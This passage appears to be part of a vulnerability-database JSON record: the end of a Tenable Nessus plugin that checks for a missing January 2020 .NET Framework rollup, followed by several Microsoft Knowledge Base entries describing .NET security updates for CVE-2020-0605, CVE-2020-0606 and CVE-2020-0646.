owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534273');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534273])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:35:53", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>January 14, 2020-KB4532933 Cumulative Update for .NET Framework 4.8 for Windows 10 version 1607 and Windows Server 2016</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>January 14, 2020</strong></p> <p> Version:<br/><strong> 
.NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><p> This update will be downloaded and installed automatically from Windows Update.<br/></p><p> To get the standalone package for this update, go to the <span lang=\"EN\"><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532933\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a></span></span></span> website. 
</p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532933.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:24", "id": "KB4532933", "href": "https://support.microsoft.com/en-us/help/4532933/", "published": "2020-01-14T00:00:00", "title": "January 14, 2020-KB4532933 Cumulative Update for .NET Framework 4.8 for Windows 10 version 1607 and Windows Server 2016", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:46:22", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>Security Only Update for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Server 2008 R2 SP1 (KB4534976)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" 
role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows 7 SP1, require SHA-2 code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. 
For more detailed information about SHA-2 code signing support updates, please see <span><span><a href=\"https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update\">KB 4474419</a>. </span></span></li> <li> All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see <a href=\"https://support.microsoft.com/en-us/help/4019990\">KB 4019990</a>. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. 
</li> </ul><h2>Additional information about this update</h2><div><span>The following articles contain additional information about this update as it relates to individual product versions.</span></div><div>\u00a0</div><ul><li><span> <a href=\"https://support.microsoft.com/help/4532960\" managed-link=\"\">4532960</a> <span>Description of the Security Only Update for .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532960)</span> </span></li><li><span> <a href=\"https://support.microsoft.com/help/4532964\" managed-link=\"\">4532964</a> <span>Description of the Security Only Update for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4532964)</span> </span></li><li><span> <a href=\"https://support.microsoft.com/help/4532971\" managed-link=\"\">4532971</a> <span>Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4532971)</span> </span></li><li><span> <a href=\"https://support.microsoft.com/help/4532952\" managed-link=\"\">4532952</a> <span>Description of the Security Only Update for .NET Framework 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532952)</span> </span></li></ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" 
shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:29", "id": "KB4534976", "href": "https://support.microsoft.com/en-us/help/4534976/", "published": "2020-01-14T17:56:29", "title": "Security Only Update for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4534976)", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:41:53", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4534978)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. 
<br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> <span>As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see </span> <a href=\"https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations \">Microsoft .NET Framework 3.5 Deployment Considerations.</a> </li> <li> All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4532961\" managed-link=\"\">4532961</a> <span>Description of the Security Only Update for .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 (KB4532961)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532962\" managed-link=\"\">4532962</a> <span>Description of the Security Only Update for .NET Framework 4.5.2 for Windows 8.1 and Windows Server 2012 R2 (KB4532962)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532970\" managed-link=\"\">4532970</a> <span>Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1 and Windows Server 2012 R2 (KB4532970)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532951\" managed-link=\"\">4532951</a> <span>Description of the Security Only Update for .NET Framework 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4532951)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a 
href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:28", "id": "KB4534978", "href": "https://support.microsoft.com/en-us/help/4534978/", "published": "2020-01-14T17:56:28", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4534978)", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:49:13", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>January 14, 2020-KB4535101 Cumulative Update for .NET Framework 3.5, 4.7.2 and 4.8 for Windows 10 Version 1809 and Windows Server 2019</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>January 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 3.5, 4.7.2 and 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). 
</p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4532947\" managed-link=\"\">4532947</a> <span>Description of the Cumulative Update for .NET Framework 3.5 and 4.7.2 for Windows 10 Version 1809 and Windows Server 2019 (KB4532947)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532937\" managed-link=\"\">4532937</a> <span>Description of the Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1809 and Windows Server 2019 (KB4532937)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" 
shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:27", "id": "KB4535101", "href": "https://support.microsoft.com/en-us/help/4535101/", "published": "2020-01-14T00:00:00", "title": "January 14, 2020-KB4535101 Cumulative Update for .NET Framework 3.5, 4.7.2 and 4.8 for Windows 10 Version 1809 and Windows Server 2019", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:40:30", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4535104)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. 
<br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> <span>As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see </span> <a href=\"https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations \">Microsoft .NET Framework 3.5 Deployment Considerations.</a> </li> <li> All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4532946\" managed-link=\"\">4532946</a> <span>Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532946)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532927\" managed-link=\"\">4532927</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532927)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532931\" managed-link=\"\">4532931</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532931)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532940\" managed-link=\"\">4532940</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532940)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> 
Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 7, "modified": "2020-01-14T17:56:26", "id": "KB4535104", "href": "https://support.microsoft.com/en-us/help/4535104/", "published": "2020-01-14T17:56:26", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4535104)", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:40:59", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4535103)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see <a href=\"https://support.microsoft.com/en-us/help/4019990\">KB 4019990</a>. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. 
</li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4532943\" managed-link=\"\">4532943</a> <span>Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows Server 2012 (KB4532943)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532928\" managed-link=\"\">4532928</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows Server 2012 (KB4532928)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532930\" managed-link=\"\">4532930</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4532930)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532939\" managed-link=\"\">4532939</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows Server 2012 (KB4532939)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" 